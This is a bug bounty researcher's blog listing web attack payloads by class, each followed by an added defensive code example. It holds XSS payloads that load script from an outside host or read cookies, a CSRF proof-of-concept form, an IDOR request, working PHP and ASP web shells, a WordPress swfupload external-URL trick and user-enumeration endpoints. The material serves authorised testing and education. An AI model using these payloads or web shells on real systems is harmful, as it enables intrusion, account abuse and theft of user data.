
Kevin Roh

Security Analyst @ Synack | Bug Bounty Participant


The contents of this blog will continue to change over time, meaning information may be added or removed without notice.

Background

My first vulnerability was submitted to Uber on October 13, 2015. I joined the Synack Red Team (SRT) in January 2017 and shortly afterwards in June 2017 I joined Synack as a Security Analyst.

Bug Bounty Programs

Bug bounty programs are set up by companies that want security researchers to look for vulnerabilities in their assets (web and/or mobile applications, APIs, etc.). Some bug bounties are responsible-disclosure-only programs, but many others will give you a reward for finding vulnerabilities and reporting them. There are platforms out there such as Synack, HackerOne, and Bugcrowd. Keep in mind that for Synack you need to go through a vetting process (interview, assessment, and background check) to be able to join, but it is well worth it since reports are usually reviewed and paid out within 24 hours of submission.

Teaching Yourself

Blogs, HackerOne Hacktivity, and Web Hacking 101 by Pete Yaworski have always been my go-to places to learn more about the vulnerabilities out there. The HackerOne Hacktivity page contains a great deal of useful information from all the disclosed reports, and by going through most of them you can get an idea of each vulnerability class out there. You can use the same method as the person in the disclosed report or, better yet, combine your method with theirs to find a vulnerability. This is how you start to learn and develop your knowledge base.

Blogs

You can view more blogs at: HackerOne - Hacker Blogs We Love Reading

Web Hacking Pro Tips

Reading Material

Tools

Vulnerable Websites

Vulnerabilities & Payloads

This section will continue to change, but I will be providing different types of payloads you can use for different types of vulnerabilities.

Cross-site Scripting (XSS)

OWASP 2013 Top 10 - XSS

You can use the payload https://unlvcsec.herokuapp.com/#/search?q=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E to execute an alert that demonstrates XSS. This also demonstrates access to the DOM (the alert shows the document's origin), which is what should be shown instead of only using alert(1).

There will always be different types of scenarios, and you'll have to use a different payload for each one. Here are a couple of examples:

  • "><img src=x onerror=alert(document.domain)>
  • </script><script>alert(document.domain)</script>
  • <script src=//0q.pe>
  • <iframe src=//0q.pe>
  • data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ+
  • javascript:alert(document.domain) (as the href of a link: Click here)
  • javascript:alert(document.cookie) (as the href of a link: Click here)

You can also use a useful tool called XSSHunter, which can take your XSS to a whole new level.
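The payloads above each target a different output context: the first breaks out of a quoted attribute, the second closes a script block, and the last ones abuse the URL scheme of a link. The following is an added example (not code from this blog) of the server-side encoding that neutralises each of those contexts; the function names, the sample inputs and the allow-listed scheme set are assumptions constructed for the illustration.

```python
import html
import json
import re
from urllib.parse import urlsplit

# Constructed sample inputs shaped like the payloads listed above (not real traffic).
SAMPLE_INPUTS = [
    '"><img src=x onerror=alert(document.domain)>',
    '</script><script>alert(document.domain)</script>',
    'javascript:alert(document.cookie)',
    'data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ+',
    'https://example.com/search?q=shoes',
]

# URL schemes a user-supplied link is allowed to use; javascript: and data: are not on it.
ALLOWED_SCHEMES = {"http", "https"}


def encode_for_html(value: str) -> str:
    """HTML text and quoted-attribute contexts: turn & < > " ' into entities
    so a value like '"><img ...>' can neither close the attribute nor open a tag."""
    return html.escape(value, quote=True)


def encode_for_script_string(value: str) -> str:
    """JavaScript string context inside a <script> block: JSON-encode, then escape
    < and > so a '</script>' inside the value cannot terminate the block."""
    return json.dumps(value).replace("<", "\\u003c").replace(">", "\\u003e")


def safe_href(value: str) -> str:
    """Allow-list the scheme of a user-supplied href. Browsers drop tab, newline and
    other control characters before reading the scheme, so strip them first; otherwise
    a tab inside 'javascript:' would slip past the check. Relative URLs (no scheme) are fine."""
    cleaned = re.sub(r"[\x00-\x20]", "", value)
    scheme = urlsplit(cleaned).scheme.lower()
    if scheme and scheme not in ALLOWED_SCHEMES:
        return "#"
    return encode_for_html(cleaned)


def render_search_result(query: str, link: str) -> str:
    """Build the fragment a search page would emit, using the encoder for each context."""
    return (
        "<p>Results for: " + encode_for_html(query) + "</p>\n"
        '<a href="' + safe_href(link) + '">' + encode_for_html(link) + "</a>\n"
        "<script>var lastQuery = " + encode_for_script_string(query) + ";</script>"
    )


if __name__ == "__main__":
    for sample in SAMPLE_INPUTS:
        print(render_search_result(sample, sample))
```

The point of keeping three encoders rather than one is that the attribute payload and the script-block payload are defeated by different transformations, and neither of those helps against a javascript: or data: URL, which only a scheme allow-list stops.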

Cross-site Request Forgery (CSRF)

OWASP 2013 Top 10 - CSRF

CSRF allows an attacker to perform a sensitive action on another user's account without their consent when the victim visits a website or link, provided the target website does not have CSRF protection such as a CSRF token or an Authorization header.

You can easily create a CSRF proof of concept in Burp Suite by right-clicking the request and choosing Engagement Tools -> Generate CSRF PoC:

<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://0q.pe" method="POST" target="_blank">
<input type="hidden" name="first_name" value="test" />
<input type="hidden" name="last_name" value="test" />
<input type="hidden" name="email" value="test@test.com" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

There will also be situations where the request contains JSON, and a regular CSRF proof of concept like the one above will not work.
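What stops the generated PoC above is a check on the receiving side that a cross-site form cannot satisfy. The following is an added example (not code from this blog or from Burp) of such a check: a token bound to the session with an HMAC, accepted either as a form field or as a custom header, with an Origin check as defence in depth. The request shape, the secret, the allowed-origin set and the function names are assumptions constructed for the example.

```python
import hashlib
import hmac
import secrets

# Constructed server-side secret; a real deployment loads this from its configuration.
SECRET_KEY = secrets.token_bytes(32)

# Origins allowed to send state-changing requests (constructed for the example).
ALLOWED_ORIGINS = {"https://0q.pe"}

SAFE_METHODS = {"GET", "HEAD", "OPTIONS"}


def issue_csrf_token(session_id: str, secret: bytes = SECRET_KEY) -> str:
    """Derive the token from the session id with an HMAC, so it is bound to one
    session and cannot be guessed or reused from another user's session."""
    return hmac.new(secret, session_id.encode(), hashlib.sha256).hexdigest()


def check_csrf(request: dict, session_id: str, secret: bytes = SECRET_KEY):
    """Decide whether a request may proceed.

    request is a constructed dict with keys "method", "headers", "form" and/or "json".
    Returns (allowed, reason)."""
    if request["method"].upper() in SAFE_METHODS:
        return True, "safe method"  # state-changing actions must never live on GET

    headers = {k.lower(): v for k, v in request.get("headers", {}).items()}

    # Defence in depth: browsers attach Origin to cross-site POSTs, so an unexpected
    # value can be rejected before the token is even looked at.
    origin = headers.get("origin")
    if origin is not None and origin not in ALLOWED_ORIGINS:
        return False, "origin not allowed"

    # The token may arrive as a form field (classic HTML forms) or as a custom header.
    # The header form is what protects JSON endpoints: a cross-site <form> can post a
    # JSON-looking body, but it cannot add custom headers.
    presented = request.get("form", {}).get("csrf_token") or headers.get("x-csrf-token")
    if not presented:
        return False, "missing token"

    expected = issue_csrf_token(session_id, secret)
    if not hmac.compare_digest(presented, expected):
        return False, "token mismatch"
    return True, "ok"


def forged_profile_update() -> dict:
    """The request the generated PoC above produces: a cross-site form post, no token."""
    return {
        "method": "POST",
        "headers": {"origin": "https://attacker.example"},
        "form": {"first_name": "test", "last_name": "test", "email": "test@test.com"},
    }
```

A per-session random value stored server-side works just as well as the HMAC derivation; the HMAC simply avoids storing anything. Endpoints authenticated only by an Authorization header (as the section mentions) are not reachable this way, because the browser never attaches that header on its own.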

Insecure Direct Object Reference (IDOR)

Insecure Direct Object References occur when an application provides direct access to objects based on user-supplied input. As a result of this vulnerability attackers can bypass authorization and access resources in the system directly, for example database records or files.

For example, the following HTTP request contains the parameter article_id in the body; when you change the id from 42872820 to 42872819 you are able to rate the transaction of another user.

POST /goods/index/rateme/ HTTP/1.1
Host: www.0q.pe
Connection: close
Content-Length: 54
Accept: application/json, text/javascript, */*; q=0.01
Origin: https://www.0q.pe
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Language: en-US,en;q=0.8,es;q=0.6

article_id=42872820&rating=1&comment=Worked+perfectly!
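The request above is accepted because the handler trusts article_id and never asks who owns that transaction. The following is an added example (not the site's code) showing the vulnerable handler beside the fixed one, run against a constructed in-memory store; the owner names, the store layout and the function names are assumptions for the illustration.

```python
from urllib.parse import parse_qs


class Forbidden(Exception):
    """Raised when the caller may not act on the requested object."""


def make_store() -> dict:
    """Constructed stand-in for the transactions table, keyed by article_id.
    Each row records which user it belongs to."""
    return {
        42872820: {"owner": "user_a", "rating": None, "comment": None},
        42872819: {"owner": "user_b", "rating": None, "comment": None},
    }


def parse_rateme_body(body: str) -> dict:
    """Parse the x-www-form-urlencoded body and validate each field's type and range."""
    fields = parse_qs(body, strict_parsing=True)
    try:
        article_id = int(fields["article_id"][0])
        rating = int(fields["rating"][0])
    except (KeyError, ValueError):
        raise ValueError("article_id and rating must be integers")
    if not 1 <= rating <= 5:
        raise ValueError("rating out of range")
    comment = fields.get("comment", [""])[0][:500]
    return {"article_id": article_id, "rating": rating, "comment": comment}


def rate_vulnerable(store: dict, current_user: str, body: str) -> dict:
    """The IDOR-prone version: uses article_id from the body and never checks ownership."""
    req = parse_rateme_body(body)
    tx = store[req["article_id"]]
    tx.update(rating=req["rating"], comment=req["comment"])
    return tx


def rate_fixed(store: dict, current_user: str, body: str) -> dict:
    """Hardened version: resolve the object, then confirm it belongs to the
    authenticated user before touching it. Missing and foreign objects get the same
    answer so the response does not reveal which ids exist."""
    req = parse_rateme_body(body)
    tx = store.get(req["article_id"])
    if tx is None or tx["owner"] != current_user:
        raise Forbidden("transaction not found")
    tx.update(rating=req["rating"], comment=req["comment"])
    return tx
```

The ownership check has to run against the authenticated identity from the session, never against anything in the request body; the only thing the client is trusted to supply is which of its own objects it means.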

Command Injection

If you are able to find a file upload location that reveals where your file is saved, and you are able to access the saved file, you can try to achieve command injection.

ASP
http://0q.pe/test.asp?cmd=net%20user

<%
dim outp

Set wShell1 = CreateObject("WScript.Shell")
Set cmd1 = wShell1.Exec("%comspec% /c " & Request.QueryString("cmd"))
outp = cmd1.StdOut.Readall()
response.write(outp)

set outp=nothing
set cmd1 = nothing
set wShell1 = nothing
%>

PHP
http://0q.pe/test.php?cmd=ls

<?php
system($_GET['cmd']);
?>
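Both scripts above only run because the upload handler kept the file's name and extension and placed it somewhere the web server executes. The following is an added example (not code from this blog) of the upload validation that closes that path: an extension allow-list that contains no script types, a file-signature check against the chosen extension, and a server-generated storage name. The allowed types, size limit and function names are assumptions constructed for the example.

```python
import os
import secrets

# Extensions the application is willing to store, with the file signature each must carry.
# Script types (php, asp, aspx, jsp, ...) are simply absent from the allow-list.
ALLOWED_TYPES = {
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "gif": (b"GIF87a", b"GIF89a"),
    "pdf": (b"%PDF-",),
}

MAX_SIZE = 5 * 1024 * 1024  # constructed limit for the example


def validate_upload(filename: str, content: bytes):
    """Return (ok, reason, extension). Only the final extension counts, and it must be
    on the allow-list; the bytes must then start with that type's signature, so
    'test.php' is refused by name and 'test.png' holding PHP is refused by content."""
    base = os.path.basename(filename)  # drop any directory components
    if "." not in base or base.startswith("."):
        return False, "no usable extension", None
    ext = base.rsplit(".", 1)[1].lower()
    if ext not in ALLOWED_TYPES:
        return False, "extension not allowed", None
    if len(content) > MAX_SIZE:
        return False, "too large", None
    if not content.startswith(ALLOWED_TYPES[ext]):
        return False, "content does not match extension", None
    return True, "ok", ext


def storage_name(ext: str) -> str:
    """Server-chosen name: random, no user-controlled characters, validated extension only."""
    return secrets.token_hex(16) + "." + ext


def store_upload(filename: str, content: bytes, upload_dir: str) -> str:
    """Write an accepted file under a random name into upload_dir, which should sit
    outside the web root so nothing there is ever served as executable code."""
    ok, reason, ext = validate_upload(filename, content)
    if not ok:
        raise ValueError(reason)
    path = os.path.join(upload_dir, storage_name(ext))
    with open(path, "wb") as fh:
        fh.write(content)
    return path
```

The signature check is a filter, not the real boundary: what actually prevents execution is storing uploads outside the document root (or in a location the server is configured never to execute) and serving them through a handler that sets the content type itself.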

WordPress Vulnerabilities

A couple of programs will accept reports for these WordPress endpoints, which reveal users, and for an SWF file that allows 401 basic-auth attacks.

When the WordPress instance still contains swfupload.swf, you can go to:

/wp-includes/js/swfupload/swfupload.swf?debugEn%xabled=true&buttonImag%xeURL=http://45.33.46.103/

http://45.33.46.103 is password protected. To create a password-protected directory, run the following command on your web server, which creates a .htpasswd file:

htpasswd -c /var/www/domain.com/public_html/.htpasswd user1

Then create a .htaccess file in the directory you would like to protect, pointing AuthUserFile at the .htpasswd file you just created:

AuthName "Restricted Area"
AuthType Basic
AuthUserFile /var/www/domain.com/public_html/.htpasswd
AuthGroupFile /dev/null
require valid-user

The following endpoints may allow you to recover usernames on the WordPress instance:

/wp-json/wp/v2/users
/wp-json/oembed/1.0/embed?url=
/wp/?rest_route=/wp/v2/users

These endpoints will allow you to obtain the users registered in the WordPress instance.
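From the defending side, requests for these endpoints and for the legacy swfupload.swf are easy to spot in the web server's access log. The following is an added example (not code from this blog or from WordPress) that classifies access-log lines against those paths and counts hits per client; the log lines are constructed in documentation address ranges, and the pattern names and function names are assumptions for the illustration.

```python
import re
from collections import Counter
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed Apache combined-format access-log lines; addresses are documentation ranges.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Aug/2017:12:00:01 +0000] "GET /wp-json/wp/v2/users HTTP/1.1" 200 1843 "-" "curl/7.54.0"
203.0.113.5 - - [10/Aug/2017:12:00:02 +0000] "GET /wp/?rest_route=%2Fwp%2Fv2%2Fusers HTTP/1.1" 200 1843 "-" "curl/7.54.0"
198.51.100.7 - - [10/Aug/2017:12:00:03 +0000] "GET /wp-includes/js/swfupload/swfupload.swf?debugEnabled=true&buttonImageURL=http://example.invalid/ HTTP/1.1" 200 28 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Aug/2017:12:00:04 +0000] "GET /wp-json/oembed/1.0/embed?url=https://blog.example/?p=1 HTTP/1.1" 200 512 "-" "curl/7.54.0"
192.0.2.9 - - [10/Aug/2017:12:00:05 +0000] "GET /2017/08/hello-world/ HTTP/1.1" 200 9120 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def classify(target: str):
    """Map a request target to the WordPress disclosure pattern it matches, or None.
    The path is percent-decoded and the query parsed, so encoded variants still match;
    keying the swfupload rule on the path means query-string obfuscation does not hide it."""
    parts = urlsplit(target)
    path = unquote(parts.path).lower()
    query = parse_qs(parts.query)
    if path.startswith("/wp-json/wp/v2/users"):
        return "rest-users-endpoint"
    if any(v.lower().startswith("/wp/v2/users") for v in query.get("rest_route", [])):
        return "rest-users-via-rest_route"
    if path.startswith("/wp-json/oembed/1.0/embed"):
        return "oembed-author-disclosure"
    if path.endswith("/swfupload/swfupload.swf"):
        return "legacy-swfupload-request"
    return None


def scan_log(text: str) -> list:
    """Return one finding per matching line: (ip, status, pattern, target)."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        pattern = classify(m["target"])
        if pattern:
            findings.append((m["ip"], int(m["status"]), pattern, m["target"]))
    return findings


def hits_per_ip(findings: list) -> Counter:
    """Count findings per client address, the quickest way to see who is enumerating."""
    return Counter(f[0] for f in findings)


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
    print(hits_per_ip(scan_log(SAMPLE_LOG)))
```

A 200 on the users endpoint is the signal worth alerting on; once the site restricts that route to authenticated users (WordPress exposes a rest_endpoints filter for this) and removes the unused swfupload directory, the same scan confirms the fix by showing those requests returning errors instead.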